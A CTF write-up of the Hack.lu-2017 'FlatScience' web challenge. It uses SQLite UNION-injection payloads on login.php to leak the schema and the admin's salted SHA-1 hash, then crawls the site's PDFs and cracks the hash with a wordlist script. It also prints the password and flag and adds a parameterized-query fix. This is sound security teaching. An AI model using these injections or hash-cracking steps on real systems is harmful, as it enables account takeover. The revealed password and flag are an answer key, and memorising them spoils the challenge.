XCTF WEB FlatScience (Hack.lu-2017)
Opening the challenge shows a pile of links and PDF documents:
Nothing stood out, so I went straight to robots.txt:
It points at admin.php, an admin login page. That got me nothing either.
There is also a login.php page; no idea why the login is spread over two pages.
Right-click to view the source, and there is a hint:
A debug parameter? Passing debug=1 dumps the source code. The main part is:
```php
<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
    $user = $_POST['usr'];
    $pass = $_POST['pw'];
    $db = new SQLite3('../fancy.db');
    $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    if($res){
        $row = $res->fetchArray();
    }
    else{
        echo "<br>Some Error occourred!";
    }
    if(isset($row['id'])){
        setcookie('name',' '.$row['name'], time() + 60, '/');
        header("Location: /");
        die();
    }
}
if(isset($_GET['debug']))
    highlight_file('login.php');
?>
<!-- TODO: Remove ?debug-Parameter! -->
```
So it is not a MySQL database but SQLite.
It still looks injectable: the parameters are spliced straight into the query with no processing at all.
I had never dealt with SQLite injection before, so this was a chance to learn it.
SQLite manual injection method summary
Injection payload: usr=' union select name,sql from sqlite_master--+&pw=admin
sqlite_master is SQLite's hidden schema table; its fields are type/name/tbl_name/rootpage/sql
Because the code puts the name column of the query result into a cookie, the Set-Cookie response header shows the result,
URL-decoded:
name= CREATE TABLE Users(id int primary key,name varchar(255),password varchar(255),hint varchar(255));
So the table name and its fields are out? This is presumably the most basic SQLite injection there is.
The syntax looks almost identical to MySQL.
Injection payloads:
usr=' union select id,id from Users--+&pw=admin
usr=' union select id,name from Users--+&pw=admin
usr=' union select id,password from Users--+&pw=admin
usr=' union select id,hint from Users--+&pw=admin
The results:
name=+1;
name=+admin;
name=+3fab54a50e770d830c0416df817567662a9dc85c;
name=+my fav word in my fav paper?!;
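To show why the schema and the hash leak through the login query, here is an added example (not the challenge's code or the writeup's) that rebuilds the login.php query against an in-memory SQLite database, runs the payloads above through it, and puts the parameterized query that closes the hole beside it. The user row, the password "flatpaper" and the in-memory database are constructed for the example.

```python
import hashlib
import sqlite3

SALT = "Salz!"  # the salt hard-coded in login.php

def salted_sha1(pw):
    # login.php computes sha1($pass."Salz!")
    return hashlib.sha1((pw + SALT).encode("utf-8")).hexdigest()

def make_db():
    """In-memory stand-in for ../fancy.db using the schema the injection revealed.
    The row is constructed sample data, not the challenge's real contents."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users(id int primary key,name varchar(255),"
               "password varchar(255),hint varchar(255))")
    db.execute("INSERT INTO Users VALUES (?,?,?,?)",
               (1, "admin", salted_sha1("flatpaper"), "my fav word in my fav paper?!"))
    return db

def login_vulnerable(db, usr, pw):
    """Mirrors login.php: usr is concatenated into the SQL text, pw is hashed."""
    sql = ("SELECT id,name from Users where name='" + usr +
           "' and password='" + salted_sha1(pw) + "'")
    return db.execute(sql).fetchone()  # first row; login.php puts row['name'] in the cookie

def login_fixed(db, usr, pw):
    """Same check with bound parameters: usr is treated as data, never as SQL."""
    return db.execute("SELECT id,name FROM Users WHERE name=? AND password=?",
                      (usr, salted_sha1(pw))).fetchone()

# The writeup's payloads; the '--+' in the URL decodes to '-- ', which comments
# out the rest of the WHERE clause (the password comparison).
SCHEMA_PAYLOAD = "' union select name,sql from sqlite_master-- "
HASH_PAYLOAD = "' union select id,password from Users-- "

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, SCHEMA_PAYLOAD, "admin"))  # ('Users', 'CREATE TABLE Users(...)')
    print(login_vulnerable(db, HASH_PAYLOAD, "admin"))    # (1, '<salted sha1 of flatpaper>')
    print(login_fixed(db, HASH_PAYLOAD, "admin"))         # None: the payload is just a name
    print(login_fixed(db, "admin", "flatpaper"))          # (1, 'admin')
```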
The hint is "my favourite word in my favourite paper"? The PDFs?
The password hashing scheme is known from the source: sha1, and the salt is given too.
So half the work is done.
Now on with it!
The SQLite injection above gave the username and password hash, and the hashing scheme is known, so the next step has to be cracking the hash.
The password is presumably somewhere in the PDF documents, but there are a lot of them. What now?
First, crawl all the PDFs.
I wrote a rough crawler. It is unfinished and has no de-duplication, so it would have crawled forever;
I stopped it by hand once it looked done (apparently around 30 PDFs):
```python
import os
import queue
import re
from urllib.parse import urljoin

import requests

q = queue.Queue()  # pages still to visit

def GetFile(url):
    # Download one PDF into pdf/, keeping the file name from the URL.
    os.makedirs('pdf', exist_ok=True)
    file_name = os.path.join('pdf', url.split('/')[-1])
    content = requests.get(url).content
    with open(file_name, 'wb') as f:
        f.write(content)
    print("Success : " + file_name)

def GetUrl(base_url, url):
    # Pull every href off the page; PDFs are downloaded, other pages are queued.
    text = requests.get(url).text
    pattern = re.compile(r'<a.+?href="(.+?)".+?>.+?</a>')
    urls = pattern.findall(text)
    for i in urls:
        i = urljoin(base_url, i)
        print(i)
        if i.endswith('.pdf'):
            GetFile(i)
        else:
            q.put(i)

url = "http://111.198.29.45:37745/index.html"
q.put(url)
# No visited set, so pages already seen get queued again; stop the script by
# hand once all the PDFs are down.
while not q.empty():
    url = q.get()
    base_url = url.split('index.html')[0]
    GetUrl(base_url, url)
```
Then I had to write a Python script to brute-force through the PDFs. What a day!
Convert the PDFs to txt first, then brute-force by reading the txt files.
I could not write the PDF-to-txt part myself (too much of a noob, crying), so I borrowed it from a senior's blog post, "python reads pdf files and converts them to txt".
(Converting the PDFs to txt by hand is not an option; copying and pasting is not that simple either, tested!)
The script is as follows (the pdf_2_txt function is the senior's implementation):
```python
from pdfminer.pdfparser import PDFParser
from pdfminer.pdfdocument import PDFDocument
from pdfminer.pdfpage import PDFPage, PDFTextExtractionNotAllowed
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import PDFPageAggregator
from pdfminer.layout import LTTextBoxHorizontal, LAParams
import logging
import hashlib
import re
import os

def pdf_2_txt(start, end):
    pdf_filename = start
    txt_filename = end
    # hide pdfminer warnings
    logging.getLogger().setLevel(logging.ERROR)
    rsrcmgr = PDFResourceManager()  # one resource manager shared by device and interpreter
    device = PDFPageAggregator(rsrcmgr, laparams=LAParams())
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    with open(pdf_filename, 'rb') as fp:
        doc = PDFDocument(PDFParser(fp))
        # check that the document allows text extraction; skip it otherwise
        if not doc.is_extractable:
            raise PDFTextExtractionNotAllowed(pdf_filename)
        with open(txt_filename, 'w', encoding="utf-8") as fw:
            for page in PDFPage.create_pages(doc):
                interpreter.process_page(page)
                # get the LTPage object for this page
                layout = device.get_result()
                # layout holds the objects parsed from the page:
                # LTTextBox, LTFigure, LTImage, LTTextBoxHorizontal and so on;
                # the text is the object's text attribute
                for x in layout:
                    if isinstance(x, LTTextBoxHorizontal):
                        fw.write(x.get_text())

filePath = 'C:\\Users\\Administrator\\Desktop\\pdf'  # where the crawler put the PDFs
lists = os.listdir(filePath)
os.makedirs('txt', exist_ok=True)
for i in range(1, 31):
    x = os.path.join(filePath, lists[i - 1])
    pdf_2_txt(x, 'txt/' + str(i) + '.txt')

TARGET = "3fab54a50e770d830c0416df817567662a9dc85c"  # admin's salted sha1 from the injection
found = False
for i in range(1, 31):
    with open("txt/" + str(i) + ".txt", "r", encoding='UTF-8') as f:
        wordlist = re.split(" |\n", f.read())
    for word in wordlist:
        # same scheme as login.php: sha1(word + "Salz!")
        encode = hashlib.sha1((word + "Salz!").encode('utf-8')).hexdigest()
        if encode == TARGET:
            print("Success! password is :" + word)
            found = True
            break
    if found:
        break
```
The script ran and found the password:
Entering the password, ThinJerboa, at admin.php:
gives the flag:
flag: flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}
My scripting is weak; I never studied Python systematically.
Writing two scripts ate the whole afternoon. How nice it would be to have the skill to do this without effort?